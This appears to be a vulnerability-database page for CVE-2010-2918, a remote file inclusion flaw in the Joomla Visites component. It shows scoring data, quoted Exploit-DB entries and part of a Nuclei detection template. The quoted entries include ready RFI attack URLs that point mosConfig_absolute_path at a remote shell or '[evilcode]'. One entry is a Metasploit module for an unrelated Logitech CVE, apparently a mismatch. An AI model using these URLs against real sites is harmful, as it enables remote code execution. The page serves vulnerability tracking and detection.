CVE-2010-2918
published 2010-07-30CVE-2010-2918: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
13.70%
96.0th percentile
PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visocrea | com_joomla_visites | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Visites 1.1 RC2 - Remote File Inclusion
exploitdb·2010-07-26
CVE-2010-2918 Joomla! Component Visites 1.1 RC2 - Remote File Inclusion
Joomla! Component Visites 1.1 RC2 - Remote File Inclusion
---
Joomla Component(com_joomla-visites) RFI
Pal-Li0ns Cr3w , HacKTeach LoverzZ
+===================================================================================+
[?]Joomla Component(com_joomla-visites) RFI
+===================================================================================+
[?] My home: [HacKTeach.org & Pal-Li0ns.com ]
[?] For Ask: [[email protected] ]
[?] Script: [ joomla ]
[?] home Script [ http://www.joomla.it ]
[?] Language: [ PHP ]
[?] Founder: [ Li0n-PaL ]
[?] Greatz to: [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - storm - Mr.NJ -]
===[ Exploit ]===
http://localhost//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[shell.txt?]
DeMo ~
http://ww
Exploit-DB
Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-2918 Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)
Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: logitechvideocall_start.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Logitech VideoCall ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX
Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the
"Start()" method, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version'
Exploit-DB
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
exploitdb·2008-04-26
CVE-2010-2918 Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28942/info
The Visites component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Visites 1.1 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]
Nuclei
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
nuclei·CVSS 7.5
CVE-2010-2918 [HIGH] Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
Template:
id: CVE-2010-2918
info:
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
author: daffainfo
severity: high
description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
impact: |
Remote file inclusion vulnerability in Joomla!
http://packetstormsecurity.org/0804-exploits/joomlavisites-rfi.txthttp://www.exploit-db.com/exploits/14476http://www.securityfocus.com/bid/28942http://www.vupen.com/english/advisories/2010/1925https://exchange.xforce.ibmcloud.com/vulnerabilities/42025http://packetstormsecurity.org/0804-exploits/joomlavisites-rfi.txthttp://www.exploit-db.com/exploits/14476http://www.securityfocus.com/bid/28942http://www.vupen.com/english/advisories/2010/1925https://exchange.xforce.ibmcloud.com/vulnerabilities/42025
2010-07-30
Published